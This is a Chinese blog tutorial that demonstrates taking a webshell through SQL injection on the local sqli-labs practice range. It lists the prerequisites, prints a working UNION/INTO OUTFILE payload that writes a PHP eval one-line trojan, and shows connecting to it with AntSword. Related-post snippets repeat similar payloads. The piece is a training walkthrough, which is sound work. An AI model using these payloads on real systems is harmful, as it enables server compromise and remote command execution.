【web安全】——基于SQL注入拿到webshell

已于 2023-01-06 18:01:09 修改
阅读量4.9k 收藏 145
点赞数 44
分类专栏: 网络安全 文章标签: 安全
于 2022-11-20 23:16:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63844103/article/details/127950411
版权

作者名:Demo不是emo 

主页面链接:主页传送门
创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构

每日emo:纵是告别,依旧意难平

 今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助

目录

一:前提条件

(1)当前sql注入用户必须为DBA权限

(2)知道网站的绝对路径

(3)My.ini文件中的secure_file_priv为空 

二:原理讲解

三:实际操作 

1.通过sql注入漏洞写入文件到指定位置 

 2.使用webshell管理工具连接

一:前提条件

想要通过sql注入获取对方服务器权限,需要满足以下条件

(1)当前sql注入用户必须为DBA权限

--is-dba参数的值为true

很多小伙伴又会问道,那dba权限是什么呢?

DBA权限就其实是数据库的超级管理员权限

只有dba才能创建数据库结构

注意:一般数据库的dba权限都为root

(2)知道网站的绝对路径

知道网站的绝对路径主要是方便我们上传木马文件

不知道怎样找网站的绝对路径的也可以看看我的教程

文章链接http://t.csdn.cn/Hmnfy

(3)My.ini文件中的secure_file_priv为空 

如下, 意思就是不限制数据的导入和导出操作

即能够上传木马文件 

二:原理讲解

 先简单给大家介绍一下流程

1.目标存在sql注入漏洞,且已经获取目标的绝对路径

2.并且通过探测发现目标能够进行数据的导入和导出操作,即secure_file_priv为空

3.当前数据库是最高权限(即dba权限)

4.利用Into outfile()   (写入文件的函数),向指定路径写入一句话木马

5.webshell连接工具连接一句话木马,成功获得权限

三:实际操作 

这里我们用大家熟知的sqli-labs靶场来给大家演示,如下

模拟环境:

1.已经知道目标存在sql注入,类型为union注入

2.通过各种方法已经获取到目标的绝对路径,为

D:\phpStudy\PHPTutorial\WWW\targetrange\sqli-labs-master\Less-1

3.通过sql注入获取用户名判断出是root用户,即dba权限 

页面如下

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1

1.通过sql注入漏洞写入文件到指定位置 

代码如下: 

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=-1' union select 1,'<?php @eval($_POST['cmd']);?>',3 into outfile 'D:\phpStudy\PHPTutorial\WWW\targetrange\sqli-labs-master\Less-1/ab.php' %23

 下面跟大家详细介绍一下这个命令的详细功能

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=-1' union select 1,'<?php @eval($_POST["cmd"]);?>',3 into outfile 'D:/phpStudy/PHPTutorial/WWW/targetrange/sqli-labs-master/Less-1/ab.php' %23


select 1,'<?php @eval($_POST["cmd"]);?>',3
指定数据

into outfile 'D:/phpStudy/PHPTutorial/WWW/targetrange/sqli-labs-master/Less-1/ab.php' %23
将数据写入目标文件目录的ab.php文件

因为是靶场,所以我们可以先看看指定目录下的文件

可以看到里面只有一个php文件和txt文件,我们执行上面的命令,如下

 没有出现报错,说明已经成功写入了,再次查看该位置下的文件,如下

 可以确定,一句话木马已经被成功写入

 2.使用webshell管理工具连接

因为我平时用蚁剑比较多,这里就给大家用蚁剑演示了,首先打开蚁剑添加数据,输入我们刚才写入的文件的路径 ,密码为cmd

 再点击添加数据,页面如下

 可以看到已经成功获取了webshell,到这里就成功通过sqk注入拿到webshel了

重新测试了一遍发现其实还是挺简单的,只是平时获取webshell都老想着找文件上传漏洞去了,所以说大家还是得记住sql注入也是可以拿到webshell的哦,只是利用条件比较苛刻,最后,感谢大家的阅读,respect! 

Daylight庆尘
关注
专栏目录
sql注入写入webshell
qq_39816136的博客
04-18 1880
最近的hvv热度高涨,最近也是接到了许多的面试电话联系。 所有就sql注入出现的次数比较频繁,是初级hvv的重中之重 我感觉十有八九会问到sql注入,这里就解说一下这个sql注入写入webshell
SQL注入得到WEBSHELL
11-15 1026
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
SQL注入webshell上传
最新发布
aihua002的博客
08-05 361
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
实战演练:从SQL注入WebShell获取
weixin_43822401的博客
07-12 545
SQL注入漏洞是Web应用程序面临的主要安全威胁之一。本文通过一个实战案例,详细演示了从识别SQL注入漏洞到获取WebShell的完整攻击链,旨在提高网络安全专业人士的防御能力。
文件上传漏洞
zhoutong2323的博客
04-06 880
Webshell是指一种利用Web漏洞获取远程操作权限的工具或脚本,Webshell通常隐藏在Web应用程序的后台目录中,攻击者通过利用一些已知的或未知的漏洞,将Webshell上传到服务器中。一旦成功部署Webshell,攻击者可以通过浏览器或专门的管理工具对服务器进行远程操控,并执行任意操作。
一次与sql注入 & webshell 的美丽“邂逅”
weixin_34218890的博客
04-27 164
引言 一波未平,一波又起。金融公司的业务实在是太引人耳目,何况我们公司的业处正处于风口之上(区块链金融),并且每天有大量现金交易,所以不知道有多少黑客躲在暗处一直在盯着你的系统,让你防不胜防,并且想方设法的找到突破点,以达到黑客的目的来获取非法利益。俗话说:“道高一尺,魔高一丈”。系统和代码也可以这么理解,防的在好,总有漏洞。系统和代码也没有绝对的安全。该来的总会来......sql注入与“她”相...
sql注入漏洞
weixin_49472648的博客
04-27 3675
SQL注入漏洞 文章目录SQL注入漏洞一、SQL注入原理实现注入攻击的两个关键条件(重点)二、SQL注入危害三、SQL注入防御四、SQL注入分类五、SQL注入流程流程细节六、手工注入实例1、判断是否存在SQL注入点2、判断注入类型3、判断字段数4、判断回显位置5、判断数据库名6、确定表名7、确定字段名8、获取用户名与密码9、MD5解密—破解密码七、sqlmap注入实例1、判断是否存在注入点2、爆数据库名3、指定库名,列出所有元素4、指定库名、表名,列出所有字段5、指定库名、表名、字段名,列出指定字段 一、S
sql注入知识点
m0_55772907的博客
04-27 3690
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4453
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)
hackzkaq的博客
12-23 3795
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员——君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文章内容 尝试一下更改bti的值 试试直接用sqlmap跑 测试成功,存在sql注入 尝试参数 —os-shell 看看是否能拿到shell 成功getshell 但是我们执行命令默认都在’C:\Windows\system32’这个路径下 我们可以看到当我们执行e: 没有回显 再次执行chdi.
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2730
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
SQL注入webshell
huangyongkang666的博客
03-25 2873
SQL注入webshell 1.MySQL写shell 写入WebShell的几种方式 1、利用Union select 写入 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
另类sql注入webshell
chongsi9495的博客
04-17 201
sql注入,想必大家都知道,本文教大家如果通过常规方法不行的前提下,拿下网站shell。 凡是以http://www.xxx.com/xxx.asp?id=1类似名称都可以通过著名的and 1=1 和and 1=2来检测是否存在漏洞。 当时我拿的一个网站(为了安全考虑,此时不举出该网站的名...
SQL注入(4)——实战SQL注入webshell
realmels的博客
05-27 1246
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP 通过一个实例来进行SQL注入的实战。 ...
SQL注入webshell的实验
wangqiao258的博客
07-01 291
1.知道网站绝对路径2.数据库ROOT权限3.secure_file_priv不为NULL,为空或为网站路径查询mysql路径,猜测网站绝对路径查询当前用户查询secure_file_priv写入webshell测试shell
WebShell通过SQL语句管理MSSQL
chengjingdeni的专栏
08-07 482
<br />   最近在做一个网络安全相关项目的渗透测试,在拿到了服务器的webshell之后,需要进一步渗透,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Server 2005提权拿到系统权限,由于拿到webshell的服务器在内网,通过防火墙做了端口映射,无法直接使用SQL Server管理工具进行管理,就需要通过webshell执行SQL 语句来操作SQL Server数据库,其中用到了一些非常规的SQL语句,列举一些sql语句来介绍数据库,数据表
SQL注入写入Webshell
weixin_43749601的博客
03-28 2875
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否写入webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Daylight庆尘

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值